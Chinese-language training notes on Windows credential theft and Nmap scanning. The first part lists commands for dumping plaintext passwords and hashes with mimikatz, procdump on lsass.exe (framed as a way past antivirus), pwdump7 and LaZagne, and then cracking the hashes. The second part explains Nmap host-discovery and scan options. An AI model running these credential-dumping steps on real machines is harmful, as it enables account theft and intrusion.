(mimikatz、pwdump/procdump/LaZagne/nmap)
很緊張很“充實”的教育訓練,今天主要是教了怎麼抓取PC的密碼……
- 密碼抓取5法
1.1mimikatz抓取明文密碼
mimikatz是一個法國人寫的輕量級調試器。出衆之處在于其可以直接從 lsass.exe 裡獵取windows處于active狀态賬号明文密碼,非常強大。
在網上找了一些相關的文章自己的一點總結吧
下載下傳位址:https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170409
mimikatz_trunk為編譯好的exe檔案
mimikatz_master為源碼檔案
下面是在我機器上的運作結果:(版本2.1.1,64位OS)
這個軟體被稱為密碼抓取神器,mimikatz2.0以後的版本抓取密碼很簡單,隻需要兩步:
第一條(提升權限)
privilege::debug
居然報錯。。。用管理者身份運作猕猴桃就可以了:
第二條(抓取密碼)
sekurlsa::logonpasswords
密碼比較sao……
1.2mimikatz抓取hash
上上張圖檔裡面就有hash,随便找一個hash網站破解就行,俄羅斯的那個比較牛逼,國内還是cmd5。。
1.3procdump結合mimikatz(大機率procdump不會被清除)
和手動dump出來是一樣的:
參考冰河大佬的部落格《滲透之 ----------利用prodump+mimikataz繞過殺軟擷取Windows明文密碼》
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
用管理者執行後:
換成32位:
用猕猴桃:
2、拿到 mimikatz 檔案夾執行指令讀明文:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
直接輸出到文本
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" >pass.txt
mimikatz 直接讀取密碼:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> password.txt
1.4 pwdump7以及彩虹表破解hash
Pwdump7可以在CMD下提取出系統中的使用者的密碼hash (包括LM和NTLM),也就是SAM檔案中的資料,另外值得注意的是必須要有系統權限才可使用此指令
輸入指令後會得到一下資料 window下uid号為500的即為管理者權限(linux為0)
複制黃色框裡面的内容即可破解
另外還可以利用ophcrack加入彩虹表來破解
這是官方給出的免費的彩虹表、Ophcrack
最後其實也不用這麼麻煩,使用getpass軟體可直接讀出使用者賬戶資訊
1.5LaZagne抓取密碼,據說神器
使用LaZagne擷取各種密碼 | 若水齋
直接lazagne.exe all
- Nmap
2.1 -sL (清單掃描)
清單掃描是主機發現的退化形式,它僅僅列出指定網絡上的每台主機, 不發送任何封包到目标主機。預設情況下,Nmap仍然對主機進行反向域名解析以擷取 它們的名字。簡單的主機名能給出的有用資訊常常令人驚訝。例如, fw.chi.playboy.com是花花公子芝加哥辦公室的 防火牆。Nmap最後還會報告IP位址的總數。清單掃描可以很好的確定您擁有正确的目标IP。 如果主機的域名出乎您的意料,那麼就值得進一步檢查以防錯誤地掃描其它組織的網絡。
既然隻是列印目标主機的清單,像其它一些進階功能如端口掃描,作業系統探測或者Ping掃描 的選項就沒有了。如果您希望關閉ping掃描而仍然執行這樣的進階功能,請繼續閱讀關于 -P0選項的介紹。
2.2 -sP (Ping掃描)
該選項告訴Nmap僅僅 進行ping掃描 (主機發現),然後列印出對掃描做出響應的那些主機。 沒有進一步的測試 (如端口掃描或者作業系統探測)。 這比清單掃描更積極,常常用于 和清單掃描相同的目的。它可以得到些許目标網絡的資訊而不被特别注意到。 對于攻擊者來說,了解多少主機正在運作比清單掃描提供的一列IP和主機名往往更有價值。
系統管理者往往也很喜歡這個選項。 它可以很友善地得出 網絡上有多少機器正在運作或者監視伺服器是否正常運作。常常有人稱它為 地毯式ping,它比ping廣播位址更可靠,因為許多主機對廣播請求不響應。
-sP選項在預設情況下, 發送一個ICMP回聲請求和一個TCP封包到80端口。如果非特權使用者執行,就發送一個SYN封包 (用connect()系統調用)到目标機的80端口。 當特權使用者掃描區域網路上的目标機時,會發送ARP請求(-PR), ,除非使用了--send-ip選項。 -sP選項可以和除-P0)之外的任何發現探測類型-P* 選項結合使用以達到更大的靈活性。 一旦使用了任何探測類型和端口選項,預設的探測(ACK和回應請求)就被覆寫了。 當防守嚴密的防火牆位于運作Nmap的源主機和目标網絡之間時, 推薦使用那些進階選項。否則,當防火牆捕獲并丢棄探測包或者響應包時,一些主機就不能被探測到。
-P0 (無ping)
該選項完全跳過Nmap發現階段。 通常Nmap在進行高強度的掃描時用它确定正在運作的機器。 預設情況下,Nmap隻對正在運作的主機進行高強度的探測如 端口掃描,版本探測,或者作業系統探測。用-P0禁止 主機發現會使Nmap對每一個指定的目标IP位址 進行所要求的掃描。是以如果在指令行指定一個B類目标位址空間(/16), 所有 65,536 個IP位址都會被掃描。 -P0的第二個字元是數字0而不是字母O。 和清單掃描一樣,跳過正常的主機發現,但不是列印一個目标清單, 而是繼續執行所要求的功能,就好像每個IP都是活動的。
-PR (ARP Ping)
最常見的Nmap使用場景之一是掃描一個以太區域網路。 在大部分區域網路上,特别是那些使用基于 RFC1918私有位址範圍的網絡,在一個給定的時間絕大部分 IP位址都是不使用的。 當Nmap試圖發送一個原始IP封包如ICMP回聲請求時, 作業系統必須确定對應于目标IP的硬體 位址(ARP),這樣它才能把以太幀送往正确的位址。 這一般比較慢而且會有些問題,因為作業系統設計者認為一般不會在短時間内 對沒有運作的機器作幾百萬次的ARP請求。
當進行ARP掃描時,Nmap用它優化的算法管理ARP請求。 當它收到響應時, Nmap甚至不需要擔心基于IP的ping封包,既然它已經知道該主機正在運作了。 這使得ARP掃描比基于IP的掃描更快更可靠。 是以預設情況下,如果Nmap發現目标主機就在它所在的區域網路上,它會進行ARP掃描。 即使指定了不同的ping類型(如 -PI或者 -PS) ,Nmap也會對任何相同區域網路上的目标機使用ARP。 如果您真的不想要ARP掃描,指定 --send-ip。
-n (不用域名解析)
告訴Nmap 永不對它發現的活動IP位址進行反向域名解析。 既然DNS一般比較慢,這可以讓事情更快些。
-R (為所有目标解析域名)
告訴Nmap 永遠 對目标IP位址作反向域名解析。 一般隻有當發現機器正在運作時才進行這項操作。
--system-dns (使用系統域名解析器)
預設情況下,Nmap通過直接發送查詢到您的主機上配置的域名伺服器 來解析域名。為了提高性能,許多請求 (一般幾十個 ) 并發執行。如果您希望使用系統自帶的解析器,就指定該選項 (通過getnameinfo()調用一次解析一個IP)。除非Nmap的DNS代碼有bug--如果是這樣,請聯系我們。 一般不使用該選項,因為它慢多了。系統解析器總是用于IPv6掃描。
sP ping 掃描
nmap 可以利用類似window/linux 系統下的ping方式進行掃描
nmap -sP <target ip>
一般來說 我們會用這個指令去掃描内網的一個ip範圍用來做内網的主機發現。
nmap -sP 10.130.1.1-255
PING掃描不同于其它的掃描方式因為它隻用于找出主機是否是存在在網絡中的.它不是用來發現是否開放端口的.PING掃描需要ROOT權限如果使用者沒有ROOT權限,PING掃描将會使用connect()調用.
sS SYN半開放掃描
nmap -sS 192.168.1.1
Tcp SYN Scan (sS) 這是一個基本的掃描方式,它被稱為半開放掃描因為這種技術使得Nmap不需要通過完整的握手就能獲得遠端主機的資訊。Nmap發送SYN包到遠端主機但是它不會産生任何會話.是以
不會在目标主機上産生任何日志記錄
,因為沒有形成會話。這個就是SYN掃描的優勢.如果Nmap指令中沒有指出掃描類型,預設的就是
Tcp SYN
.但是它需要
root/administrator
權限。
sT TCP掃描
nmap -sT 192.168.1.1
不同于Tcp SYN掃描,Tcp connect()掃描需要完成三次握手,并且要求調用系統的connect().Tcp connect()掃描技術隻适用于找出TCP和UDP端口。
sU UDP掃描
nmap -sU 192.168.1.1
這種掃描技術用來尋找目标主機打開的UDP端口.它不需要發送任何的SYN包因為這種技術是針對UDP端口的。UDP掃描發送UDP資料包到目标主機并等待響應,如果傳回ICMP不可達的錯誤消息說明端口是關閉的如果得到正确的适當的回應說明端口是開放的.